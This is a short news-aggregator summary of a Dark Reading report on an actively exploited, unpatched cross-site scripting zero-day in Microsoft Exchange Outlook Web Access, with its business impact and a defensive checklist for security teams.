Microsoft Exchange Zero-Day Under Attack
TL;DR: A new zero-day vulnerability in Microsoft Exchange, identified as CVE-2026-42897, is being actively exploited. The flaw is a cross-site scripting (XSS) issue that allows attackers to compromise Outlook Web Access (OWA) mailboxes. Microsoft has not yet released a patch to fix the vulnerability.
Key facts
- Category
- Cybersecurity
- Impact
- Low
- Published
- Source
- Dark Reading
Full summary
A new, unpatched zero-day vulnerability in Microsoft Exchange is being actively exploited, allowing attackers to compromise Outlook Web Access mailboxes.
A new zero-day vulnerability in Microsoft Exchange is being actively exploited by attackers. The security flaw, officially tracked as CVE-2026-42897, is a cross-site scripting (XSS) vulnerability. This type of flaw enables attackers to inject malicious scripts into web pages that are then viewed by unsuspecting users. In this specific case, the vulnerability targets Microsoft's Outlook Web Access (OWA), the popular web-based email client for Exchange Server. The fact that it is being actively exploited means that threat actors are already using this previously unknown flaw to target organizations. Microsoft has acknowledged the vulnerability but has not yet released a security patch to fix it.
The immediate impact of this vulnerability is the potential for attackers to compromise user mailboxes through OWA. A successful exploit could grant an attacker unauthorized access to sensitive information contained within emails, including confidential business communications, personal data, and login credentials. This access could lead to significant data breaches, further network intrusion, or sophisticated phishing campaigns launched from a trusted internal account, making them harder to detect. Because there is no patch available, any organization running on-premise Microsoft Exchange servers with OWA exposed to the internet is at immediate risk. Security teams should closely monitor their systems for signs of compromise.
Why it matters
An unpatched, actively exploited XSS vulnerability in a critical business tool like Exchange OWA presents a significant risk. It allows for account takeover and data theft, making it a potent threat for targeted attacks against organizations.
Business impact
Compromised email accounts can lead to major data breaches, financial loss, and reputational damage. Attackers can access sensitive corporate data, launch internal phishing campaigns, or use the compromised accounts for business email compromise (BEC) fraud. The lack of a patch heightens the risk.
⚡ Action needed
A patch is not yet available. Security teams should monitor for suspicious activity on Outlook Web Access (OWA) and prepare to apply a patch as soon as Microsoft releases it.
Action checklist
- 1Identify all on-premise Microsoft Exchange servers running Outlook Web Access (OWA).
- 2Monitor OWA logs for any unusual or suspicious activity.
- 3Await an official security patch and guidance from Microsoft.
- 4Prepare for emergency patching once the update is released.
Tags
Primary source: Dark Reading